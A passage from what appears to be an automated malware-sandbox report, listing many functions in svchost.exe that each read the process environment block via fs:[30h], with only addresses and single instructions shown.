            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB92BC mov eax, dword ptr fs:[00000030h]1_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB92BC mov eax, dword ptr fs:[00000030h]1_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB92BC mov ecx, dword ptr fs:[00000030h]1_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB92BC mov ecx, dword ptr fs:[00000030h]1_2_03AB92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6E284 mov eax, dword ptr fs:[00000030h]1_2_03A6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB0283 mov eax, dword ptr fs:[00000030h]1_2_03AB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05283 mov eax, dword ptr fs:[00000030h]1_2_03B05283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6329E mov eax, dword ptr fs:[00000030h]1_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6329E mov eax, dword ptr fs:[00000030h]1_2_03A6329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE12ED mov eax, dword ptr fs:[00000030h]1_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A402E1 mov eax, dword ptr fs:[00000030h]1_2_03A402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B052E2 mov eax, dword ptr fs:[00000030h]1_2_03B052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEF2F8 mov eax, dword ptr fs:[00000030h]1_2_03AEF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A292FF mov eax, dword ptr fs:[00000030h]1_2_03A292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03A3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5B2C0 mov eax, dword ptr fs:[00000030h]1_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A392C5 mov eax, dword ptr fs:[00000030h]1_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A392C5 mov eax, dword ptr fs:[00000030h]1_2_03A392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]1_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]1_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B2D3 mov eax, dword ptr fs:[00000030h]1_2_03A2B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]1_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5F2D0 mov eax, dword ptr fs:[00000030h]1_2_03A5F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05227 mov eax, dword ptr fs:[00000030h]1_2_03B05227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2823B mov eax, dword ptr fs:[00000030h]1_2_03A2823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A67208 mov eax, dword ptr fs:[00000030h]1_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A67208 mov eax, dword ptr fs:[00000030h]1_2_03A67208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A34260 mov eax, dword ptr fs:[00000030h]1_2_03A34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFD26B mov eax, dword ptr fs:[00000030h]1_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AFD26B mov eax, dword ptr fs:[00000030h]1_2_03AFD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2826B mov eax, dword ptr fs:[00000030h]1_2_03A2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A59274 mov eax, dword ptr fs:[00000030h]1_2_03A59274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A71270 mov eax, dword ptr fs:[00000030h]1_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A71270 mov eax, dword ptr fs:[00000030h]1_2_03A71270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE0274 mov eax, dword ptr fs:[00000030h]1_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29240 mov eax, dword ptr fs:[00000030h]1_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29240 mov eax, dword ptr fs:[00000030h]1_2_03A29240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6724D mov eax, dword ptr fs:[00000030h]1_2_03A6724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A250 mov eax, dword ptr fs:[00000030h]1_2_03A2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEB256 mov eax, dword ptr fs:[00000030h]1_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEB256 mov eax, dword ptr fs:[00000030h]1_2_03AEB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36259 mov eax, dword ptr fs:[00000030h]1_2_03A36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE11A4 mov eax, dword ptr fs:[00000030h]1_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE11A4 mov eax, dword ptr fs:[00000030h]1_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE11A4 mov eax, dword ptr fs:[00000030h]1_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AE11A4 mov eax, dword ptr fs:[00000030h]1_2_03AE11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4B1B0 mov eax, dword ptr fs:[00000030h]1_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A70185 mov eax, dword ptr fs:[00000030h]1_2_03A70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AEC188 mov eax, dword ptr fs:[00000030h]1_2_03AEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB019F mov eax, dword ptr fs:[00000030h]1_2_03AB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A197 mov eax, dword ptr fs:[00000030h]1_2_03A2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A87190 mov eax, dword ptr fs:[00000030h]1_2_03A87190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A551EF mov eax, dword ptr fs:[00000030h]1_2_03A551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A351ED mov eax, dword ptr fs:[00000030h]1_2_03A351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AD71F9 mov esi, dword ptr fs:[00000030h]1_2_03AD71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B061E5 mov eax, dword ptr fs:[00000030h]1_2_03B061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A601F8 mov eax, dword ptr fs:[00000030h]1_2_03A601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF61C3 mov eax, dword ptr fs:[00000030h]1_2_03AF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6D1D0 mov eax, dword ptr fs:[00000030h]1_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6D1D0 mov ecx, dword ptr fs:[00000030h]1_2_03A6D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03AAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B051CB mov eax, dword ptr fs:[00000030h]1_2_03B051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A60124 mov eax, dword ptr fs:[00000030h]1_2_03A60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A31131 mov eax, dword ptr fs:[00000030h]1_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A31131 mov eax, dword ptr fs:[00000030h]1_2_03A31131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B136 mov eax, dword ptr fs:[00000030h]1_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B136 mov eax, dword ptr fs:[00000030h]1_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B136 mov eax, dword ptr fs:[00000030h]1_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2B136 mov eax, dword ptr fs:[00000030h]1_2_03A2B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov ecx, dword ptr fs:[00000030h]1_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03ADA118 mov eax, dword ptr fs:[00000030h]1_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF0115 mov eax, dword ptr fs:[00000030h]1_2_03AF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2F172 mov eax, dword ptr fs:[00000030h]1_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC9179 mov eax, dword ptr fs:[00000030h]1_2_03AC9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B05152 mov eax, dword ptr fs:[00000030h]1_2_03B05152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov ecx, dword ptr fs:[00000030h]1_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AC4144 mov eax, dword ptr fs:[00000030h]1_2_03AC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29148 mov eax, dword ptr fs:[00000030h]1_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29148 mov eax, dword ptr fs:[00000030h]1_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29148 mov eax, dword ptr fs:[00000030h]1_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A29148 mov eax, dword ptr fs:[00000030h]1_2_03A29148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A37152 mov eax, dword ptr fs:[00000030h]1_2_03A37152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C156 mov eax, dword ptr fs:[00000030h]1_2_03A2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A36154 mov eax, dword ptr fs:[00000030h]1_2_03A36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov eax, dword ptr fs:[00000030h]1_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03AF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A3208A mov eax, dword ptr fs:[00000030h]1_2_03A3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2D08D mov eax, dword ptr fs:[00000030h]1_2_03A2D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A35096 mov eax, dword ptr fs:[00000030h]1_2_03A35096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D090 mov eax, dword ptr fs:[00000030h]1_2_03A5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A5D090 mov eax, dword ptr fs:[00000030h]1_2_03A5D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A6909C mov eax, dword ptr fs:[00000030h]1_2_03A6909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A550E4 mov eax, dword ptr fs:[00000030h]1_2_03A550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A550E4 mov ecx, dword ptr fs:[00000030h]1_2_03A550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03A2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A380E9 mov eax, dword ptr fs:[00000030h]1_2_03A380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03A2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A720F0 mov ecx, dword ptr fs:[00000030h]1_2_03A720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov ecx, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov ecx, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov ecx, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov ecx, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A470C0 mov eax, dword ptr fs:[00000030h]1_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B050D9 mov eax, dword ptr fs:[00000030h]1_2_03B050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]1_2_03AAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AAD0C0 mov eax, dword ptr fs:[00000030h]1_2_03AAD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB20DE mov eax, dword ptr fs:[00000030h]1_2_03AB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A590DB mov eax, dword ptr fs:[00000030h]1_2_03A590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2A020 mov eax, dword ptr fs:[00000030h]1_2_03A2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A2C020 mov eax, dword ptr fs:[00000030h]1_2_03A2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF903E mov eax, dword ptr fs:[00000030h]1_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF903E mov eax, dword ptr fs:[00000030h]1_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF903E mov eax, dword ptr fs:[00000030h]1_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AF903E mov eax, dword ptr fs:[00000030h]1_2_03AF903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03AB4000 mov ecx, dword ptr fs:[00000030h]1_2_03AB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A4E016 mov eax, dword ptr fs:[00000030h]1_2_03A4E016
